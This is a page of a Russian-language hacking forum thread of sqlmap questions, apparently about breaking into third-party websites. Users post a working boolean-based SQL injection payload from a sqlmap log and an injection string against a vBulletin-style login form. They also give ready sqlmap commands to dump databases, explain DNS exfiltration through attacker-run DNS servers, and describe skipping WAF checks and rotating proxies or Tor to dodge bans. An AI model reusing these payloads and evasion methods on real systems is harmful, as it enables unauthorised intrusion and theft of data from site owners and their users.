Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Alex_Smolin

    Alex_Smolin Member

    Joined:
    6 Jan 2017
    Messages:
    18
    Likes Received:
    6
    Reputations:
    0
    Покупаешь 2 впс или дедики, ставишь на них бинд9 для поднятия мастер и слейв днс сервера.
    Потом регаешь домен любой на свои днс, после того как домен делигрировали, запускаешь скульмап с ключом --dns-domain (скульмап нужно запускать не у себя на пк, а на впс там где твой мастер днс)
    Но заметь DNS exfiltration получится заюзать когда сервер сайта на винде если на линуксе то ничего не выйдет
     
  2. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Подскажите! через sqlmap получил sql inj под ограниченной учеткой, доступно только SELECT, сбрутил хэши других пользователей базы данных у которых больше прав, как мне в sqlmap подключится к другой учетке через sql inj?
     
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    никак, ищите интерфейс доступа к бд, phpmyadmin etc
     
    _________________________
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    лол с чего бы это интересно?
     
    _________________________
  5. Alex_Smolin

    Alex_Smolin Member

    Joined:
    6 Jan 2017
    Messages:
    18
    Likes Received:
    6
    Reputations:
    0
    для успешной организации DNS-туннеля в Microsoft SQL Server, PostgreSQL и MySQL эти СУБД должны поддерживать пути в формате UNC, что, в общем-то, означает, что такой туннель можно создать, если на сервере в качестве бэкенда будет использоваться ОС Microsoft Windows.
     
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    ну не правда же :) есть нное количество способ сделать резолв домена, например oracle
    UTL_INADDR.GET_HOST_ADDRESS
    UTL_HTTP.REQUEST
    HTTPURITYPE.GETCLOB

    в postgresql, если не ошибаюсь, можно организовать подключение к удаленной бд "на лету", в текущем подключении, чем не dns exfiltration? пусть даже трафик исходящий зарезан на большинство портов, резолв всё равно в большинстве случаев пройдет
     
    _________________________
    Alex_Smolin likes this.
  7. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    добрый подскажие как решить
    Как только не пробовал и указывать --dbms=mysql | -b | -f
    А в результате:
    [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

    P.S>
    Server: Apache/2.2.15 (CentOS)
    X-Powered-By: PHP/5.3.3
    Code:
            ___
           __H__
    ___ ___[.]_____ ___ ___  {1.1.1.10#dev}
    |_ -| . [,]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 10:48:05
    
    [10:48:05] [INFO] parsing HTTP request from 'vsd.txt'
    [10:48:05] [WARNING] provided value for parameter 'user_search_products[status]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
    [10:48:05] [WARNING] provided value for parameter 'user_search_products[search_type]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
    [10:48:05] [INFO] testing connection to the target URL
    [10:48:06] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [10:48:08] [WARNING] reflective value(s) found and filtering out
    [10:48:08] [INFO] testing if the target URL is stable
    [10:48:09] [INFO] target URL is stable
    [10:48:09] [INFO] testing if POST parameter 'user_search_products[from]' is dynamic
    [10:48:10] [INFO] confirming that POST parameter 'user_search_products[from]' is dynamic
    [10:48:10] [INFO] POST parameter 'user_search_products[from]' is dynamic
    [10:48:11] [WARNING] heuristic (basic) test shows that POST parameter 'user_search_products[from]' might not be injectable
    [10:48:11] [INFO] testing for SQL injection on POST parameter 'user_search_products[from]'
    [10:48:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [10:48:26] [INFO] POST parameter 'user_search_products[from]' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="\u0421\u0430\u043d\u043a\u0442-\u041f\u0435\u0442\u0435\u0440\u0431\u0443\u0440\u0433, \u0420\u043e\u0441\u0441\u0438\u044f - \u041c\u043e\u0441\u043a\u0432\u0430, \u0420\u043e\u0441\u0441\u0438\u044f")
    [10:48:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [10:48:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
    [10:48:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
    [10:48:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
    [10:48:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [10:48:35] [INFO] testing 'MySQL inline queries'
    [10:48:36] [INFO] testing 'PostgreSQL inline queries'
    [10:48:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
    [10:48:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
    [10:48:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
    [10:48:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
    [10:48:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
    [10:48:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
    [10:48:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
    [10:48:40] [INFO] testing 'Oracle AND time-based blind'
    [10:48:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [10:48:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [10:48:51] [INFO] checking if the injection point on POST parameter 'user_search_products[from]' is a false positive
    POST parameter 'user_search_products[from]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests:
    ---
    Parameter: user_search_products[from] (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: user_search_products[from]=%D0%A1%D0%B0%D0%BD%D0%BA%D1%82-%D0%9F%D0%B5%D1%82%D0%B5%D1%80%D0%B1%D1%83%D1%80%D0%B3, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%' AND 5693=5693 AND '%'='&user_search_products[to]=%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B0, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F&user_search_products[startDate]=2017-01-18&user_search_products[endDate]=2017-01-31&user_search_products[train]=train&user_search_products[car]=car&user_search_products[status]=&user_search_products[search_type]=&user_search_products[search]=1&user_search_products[_token]=51dfe11994f10d02f4d92c43fed3b00ef606f937
    ---
    [10:49:00] [INFO] testing MySQL
    [10:49:00] [WARNING] the back-end DBMS is not MySQL
    [10:49:00] [INFO] testing Oracle
    [10:49:01] [WARNING] the back-end DBMS is not Oracle
    [10:49:01] [INFO] testing PostgreSQL
    [10:49:01] [WARNING] the back-end DBMS is not PostgreSQL
    [10:49:01] [INFO] testing Microsoft SQL Server
    [10:49:02] [WARNING] the back-end DBMS is not Microsoft SQL Server
    [10:49:02] [INFO] testing SQLite
    [10:49:02] [WARNING] the back-end DBMS is not SQLite
    [10:49:02] [INFO] testing Microsoft Access
    [10:49:03] [WARNING] the back-end DBMS is not Microsoft Access
    [10:49:03] [INFO] testing Firebird
    [10:49:03] [WARNING] the back-end DBMS is not Firebird
    [10:49:03] [INFO] testing SAP MaxDB
    [10:49:04] [WARNING] the back-end DBMS is not SAP MaxDB
    [10:49:04] [INFO] testing Sybase
    [10:49:05] [WARNING] the back-end DBMS is not Sybase
    [10:49:05] [INFO] testing IBM DB2
    [10:49:05] [WARNING] the back-end DBMS is not IBM DB2
    [10:49:05] [INFO] testing HSQLDB
    [10:49:06] [WARNING] the back-end DBMS is not HSQLDB or version is < 1.7.2
    [10:49:06] [INFO] testing Informix
    [10:49:07] [WARNING] the back-end DBMS is not Informix
    [10:49:07] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
    [10:49:07] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 61 times
     
  8. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    вообщем уязвимость в файле /login.php
    Attack details
    URL encoded POST input vb_login_username was set to -1' OR 3*2*1=6 AND 000491=000491 --
    как такое заправить в sqlmap и получить бд?

    POST /ajax/login.php HTTP/1.1
    Content-Length: 193
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http:site.com:80/
    Cookie: mfsid=91olg79e3nj5nt6de6ugq5oks7; mfvb_lastvisit=1485043348; msort=views; morder=az; mfvb_sessionhash=a5613f6c416d595ef35b6db03ad466a7; loc=E_E4m6IbF_VLlaDm7ph_BwfJ46y_JHz15zI7eP9Q9gdwwJOr1usrLEth4LHDV1uyf0w6PWeToMTTYQJ0iyccmipr2OpL5jZf; sess=1; anj=dTM7k!M4/8DYRWSF']wIg2E?ajgksu!@wnf]meq8dWME4(EW<KPi?=O; icu=ChIIz5I0EAoYASABKAEwovWPxAUQovWPxAUYAA..; uuid2=232236036324528254; vi=2f37b8a7cdee445385794c4d22490464; fid=43c8d7dc1de0bdc89b1d9515f061c563; ADMARK=Sun, 22 Jan 2017 00:19:45 GMT; JEB2=5883F60075721AC455254076E0000000; __cfduid=d2fb312b6f2dec320460808e564733c5b1485044385; uid=7184278638849739066; AWSELB=83E705210A1682EC371C1D5E2E2558F3D1674E9DA1325CB04AC64150FC8B17E1E912D403C564B53C64E285925EDB501A0CACF3007DD99AD5CF2C680490773520F1E05601D7; KTPCACOOKIE=YES; PUBMDCID=3; pp=51048; pubfreq_87256=; pubtime_87256=TMC; PMDTSHR=cat:; ljt_reader=7bd9ee658b501e8dc00b7f88dbea3e76; ctag=102:1485130790|103:1485130790|168:1485130790|98:1485130790|7:1485130790|163:1485130790|162:1485130790|128:1485130790|161:1485130790|108:1485130790|160:1485130790|167:1485130790|72:1485130790|106:1486253990|166:1485130790|73:1485130790|165:1485130790|164:1485130790|153:1485130790|86:1485130790|155:1485130790|158:1485130790|159:1485130790|94:1485130790; u=aHR0cDovL21hbmdhZm94Lm1lL21hbmdh; pi=5978151310520199952; tp=3%3b1%2f22%2f2017+12%3a19%3a51+AM%3b1%2f29%2f2017+12%3a19%3a51+AM; UM1=sQAAAB-LCAAAAAAAAAvjsuIQEzLjksh0NQnI9jJIDHVLsnCyKHDz8_W38PcOCxPi5pjxb-GtR7MfmgiwSoE47xs6zoE4WgxczhwiQvZcKiaJpsmJ5omJuqYpBia6JgZAVmJaipGuUWKioXGqZYqlqVkK0JxLXVdg5nBwPPmxuZNbgBloiB5HopAWF497amhgSlqGW3KKuyVQcdvEHwhLERwtBgAeqoJGsQAAAA2; TDID=6f762b27-bb26-4c45-b0a7-42a6911a29f5; CS1=2; _t=5c1b5e1e-e039-11e6-a8c7-00259037ff12; _vt=0; 3pids=5031:5978151310520199952
    Host: site.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

    cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=-1'%20OR%203*2*1%3d6%20AND%20000491%3d000491%20--%20
     
    #348 RWD, 22 Jan 2017
    Last edited: 22 Jan 2017
  9. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    мб waf?
     
  10. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Скинь ссылку в ПМ, помогу
     
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    sqlmap похоже чекает нет ли там waf
    Code:
    ./waf/webappsecure.py:15:    return code == 403
    
    попробуй добавить --skip-waf
     
    _________________________
  12. DSW

    DSW New Member

    Joined:
    21 Aug 2016
    Messages:
    26
    Likes Received:
    4
    Reputations:
    0
    Думаю так должно пройти
    ./sqlmap -u site.com --data=cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=-1'%20OR%203*2*1%3d6%20AND%20000491%3d000491%20--%20 -p vb_login_username --dbs
     
  13. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Code:
    -u "http://www.site.com/login.php" --random-agent --threads=6 --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=1*" --level=5 --current-db 
     
    _________________________
  14. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    да в том то и дело что пробовал так, Acunetix говорит что дыра есть 100%[​IMG]
     
  15. DSW

    DSW New Member

    Joined:
    21 Aug 2016
    Messages:
    26
    Likes Received:
    4
    Reputations:
    0
    Попробуй сохронить cookie в файл ,допустим в sql.txt и после выполни
    ./sqlmap -r "путь до sql.txt" -p vb_login_username
     
  16. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    вообщем есть скуль, time base blind
    подбирает очень медленно, выдает ошибки, потом при таймауте 7 сек подбирает символ.
    Но кроме как --current-user ничего не подбирает, кто сталкивался и как действовать?
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    так скуль скуле рознь, приучайтесь читать логи, опция -v 3 , скульмап обычно пишет где спотыкается, вероятно waf есть
     
    _________________________
  18. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Можно ли запустит sqlmap через список прокси? То есть при попадании в бан 1й прокси брала из списка другую и продолжала работу?
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    попробуй

    --proxy-file=PRO.. Load proxy list from a file
     
    _________________________
  20. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    service tor start
    proxychains sqlmap .....
     
    _________________________